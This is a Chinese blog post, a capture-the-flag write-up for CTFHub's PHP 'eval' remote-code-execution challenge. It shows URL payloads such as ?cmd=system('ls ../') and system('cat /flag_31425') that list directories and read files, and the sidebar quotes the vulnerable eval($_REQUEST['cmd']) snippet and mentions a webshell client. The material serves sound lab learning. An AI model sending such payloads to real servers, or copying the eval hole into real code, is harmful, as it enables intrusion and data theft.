CTFHUB-技能树-Web题-RCE(远程代码执行)-eval执行

已于 2024-05-09 21:12:31 修改
阅读量411 收藏 2
点赞数 8
分类专栏: CTFHUB解题思路 文章标签: 前端 android
于 2024-05-09 21:11:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Static______/article/details/138631844
版权

CTFHUB-技能树-Web题-RCE(远程代码执行)

文章目录

eval执行

题目给出代码

在这里插入图片描述

先来看看eval函数是干什么用的

eval():把字符串 code 作为PHP代码执行。函数eval()语言结构是 非常危险的, 因为它允许执行任意 PHP 代码。 它这样用是很危险的。 如果您仔细的确认过,除了使用此结构以外 别无方法, 请多加注意,不要允许传入任何由用户 提供的、未经完整验证过的数据 。
解题方法:

结合该题出现在RCE板块,果断试一试在url里面get一下

构造网址,查找当前目录文件
?cmd=system("ls");切记输入;

在这里插入图片描述

并没有发现flag,接着查看上一级目录
?cmd=system("ls ../");

在这里插入图片描述

没有发现flag,耐心点

接着查看上一级
?cmd=system("ls ../../");

在这里插入图片描述

接着查看上一级目录,
?cmd=system("ls ../../../");
我们发现了flag_31425的存在。

在这里插入图片描述

在这里插入图片描述

此时就用?cmd=system(“cat /flag_31425”);打开目录下的flag。

在这里插入图片描述

system()函数:执行系统命令并输出执行结果。
?cmd=system("ls /");查看根目录,
python炒粉
关注
  • 8
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
CTFHUB-技能树-WEB通关
Alita_lxz的博客
11-11 6927
Web 目来自ctfhub技能树web部分 Web前置技能 操作系统 数据库 HTTP协议 请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 ​ 1.OPTIONS   返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功,则它会在HTTP头中包含一个名为“Allow”的头,值是所支持的方法,如“GET,POST”。  2.HEAD   向服务
CTFHub-Web-RCE-eval执行目解析
weixin_46168073的博客
11-15 1320
一、启动场景 点击web 点击RCE 点击eval执行。 开启目,启动场景。注册会送1000个币,做一个目消耗30,做完奖励100还是50,总之完全不用担心币的问。 启动之后会出现一个链接,我们点击。 二、解过程 这里会出现PHP代码。 我们使用蚁剑 。(安装之类的我会单独写一篇文章) 右键--->添加数据。 把URL复制到蚁剑,密码cmd 然后点击添加。 可以看到我们添加数据成功。 双击进...
CTFHubRCEeval执行
cx_sam的博客
08-07 932
CTFHub RCE eval执行
ctfhub-eval执行
m0_52432374的博客
03-24 1957
ctfhub-eval执行 打开目,发现是这个 <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]); } else { highlight_file(__FILE__); } ?> 然后百度eval()函数 eval():把字符串 code 作为PHP代码执行。函数eval()语言结构是 非常危险的, 因为它允许执行任意 PHP 代码。 它这样用是很危险的。 如果您仔细的确认过,除了使用此结构以外 别无方法
CTFHUB——RCEeval执行和文件包含漏洞
m0_46467017的博客
08-31 5255
代码解释:本关代码和第一关文件包含一样,通过strpos函数判断参数是否存在flag字符,存在就执行include函数。因为本关没有限制php://input伪协议,所以本关解法和上一关一样,这里就不再赘述了。代码解释:本关代码和之前php://input关卡一样,通过substr函数来判断file参数是否等于php://,如果等于就执行include函数。代码解释为如果存在cmd参数,那就用eval函数执行cmd参数中的代码,所以本关存在命令执行。连接成功后,其余步骤与上一关相同。...
ctfhub技能树webRCE里的eval执行和命令注入
2302_81010533的博客
03-30 409
远程命令/代码执行漏洞,简称为RCE漏洞,可以直接向服务器后台远程注入操作系统的命令或者代码,从而拿到服务器后台的权限。首先执行ping命令,ping本机ip:127.0.0.1,再加上ls这个系统命令,连起来就是127.0.0.1;ls接着查看里面的文件,构造命令127.0.0.1;检查网页显示内容可以发现目中直接给出了一段源代码代码的大致意思是判断用户是否传了一个 cmd 参数,否则执行 else。检查目录列表发现关于flag的文件,检查内容发现flag。,查看可以访问的文件,发现一个。
CVE-2020-21224 ClusterEngineV4.0 远程代码执行.md
04-11
CVE-2020-21224 ClusterEngineV4.0 远程代码执行
CVE-2023-40477 WinRAR 远程代码执行漏洞 PoC
09-02
unrar库作为第三方依赖项合并到Chrome OS中是合理的,尽管没有显示其用法的代码引用。 在缓解策略方面,有几种可行的选择可供考虑: 完全修复:将 Winrar 更新到 6.23+ 将完全修复该问。 修补程序
远程执行代码漏洞(CVE-2018-0886)漏洞修复
08-21
远程执行代码漏洞(Remote Code Execution,RCE)是网络安全领域的一个重要话,它指的是攻击者利用软件中的漏洞,在未经用户授权的情况下,能够在目标系统上执行任意代码。在2018年,一个特别严重的RCE漏洞——CVE...
CVE-2020-0796-RCE-POC:CVE-2020-0796远程执行代码POC
03-19
CVE-2020-0796远程执行代码POC (c)2020 ZecOps,Inc.- ://www.zecops.com-查找攻击者的错误CVE-2020-0796 /“ SMBGhost”的远程代码执行POC预期结果:具有系统访问权限的反向Shell。仅用于公司环境中的教育和测试...
Umbraco-RCE:Umbraco CMS 7.12.4-(已认证)远程执行代码
03-21
Umbraco RCE漏洞利用/ PoC Umbraco CMS 7.12.4-(已认证)远程执行代码 [ ] [ ]用法$ python exploit.py -husage: exploit.py [-h] -u USER -p PASS -i URL -c CMD [-a ARGS]Umbraco authenticated RCEoptional ...
CTF-网络挑战
03-02
本项目只是对历届CTF开源的网站 申明 由于本人重新向出人申请重新对过渡进行修改发布的权利,但对每个均标明了出处,如涉嫌犯罪,立马致歉删除。 对于部分没找到flag的翻译,会自己随便添加 对已提供Dockerfile...
fastjson-rce-exploit:利用fastjson远程执行代码漏洞
03-15
"fastjson-rce-exploit"正是针对Fastjson中的一个严重安全漏洞——远程代码执行RCE)的利用方法。这个漏洞的存在,使得攻击者有可能通过精心构造的JSON输入,执行任意的远程代码,对目标系统造成严重的危害。 ...
向日葵RCE漏洞(CNVD-2022-10270)检测工具
02-19
向日葵RCE漏洞(CNVD-2022-10270)检测工具,已经编译好,命令行运行即可 xrkrce.exe -h 127.0.0.1
ctf+任意命令执行RCE+常见系统命令+web安全
10-08
ctf+RCE+常见系统命令+web安全
CTFHUB-RCE-eval执行
u014794539的博客
07-11 263
考点 一句话木马 eval执行 思路分析 打开直接 <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]); } else { highlight_file(__FILE__); } ?> 那就直接连蚁剑了。。。。 直接找到了 得到flag ctfhub{587c0757ccda0ba89da63da0} ...
CTFHub | eval执行
尼泊罗河伯的博客
04-19 1270
eval 函数可以将字符串作为代码执行,那么在使用 eval 函数作为获取用户输入的时候应该避免使用这类函数。如果用户输入的是一段恶意代码,就会导致严重的安全问
OpenSSH 远程代码执行漏洞(CVE-2024-6387)
最新发布
07-04
<< OpenSSH 是一个广泛使用的开源网络协议,用于提供安全的远程登录(SSH)服务。CVE-2024-6387是一个公开的安全漏洞,也被称为“OpenSSH 命令注入漏洞”或“SSH Remote Code Execution (RCE)”,它发生在某些版本的 OpenSSH 中。 这个漏洞允许攻击者通过精心构造的 SSH 命令执行任意系统命令,从而获得对远程服务器的控制,如果用户权限足够,这可能导致严重的数据泄露或系统破坏。具体来说,攻击者能够利用该漏洞通过发送恶意 SSH 延迟请求,使得 SSH 服务器处理命令的过程中出现错误,从而绕过输入验证机制,得以执行未经授权的操作。 修复此漏洞的方法通常是升级到最新版的 OpenSSH 客户端和服务器软件,因为开发团队通常会为这类高危漏洞发布补丁。为了保护系统安全,管理员应尽快应用这些更新,并限制不必要的 SSH 访问权限,只允许经过身份验证并有明确授权的用户连接。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

python炒粉

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值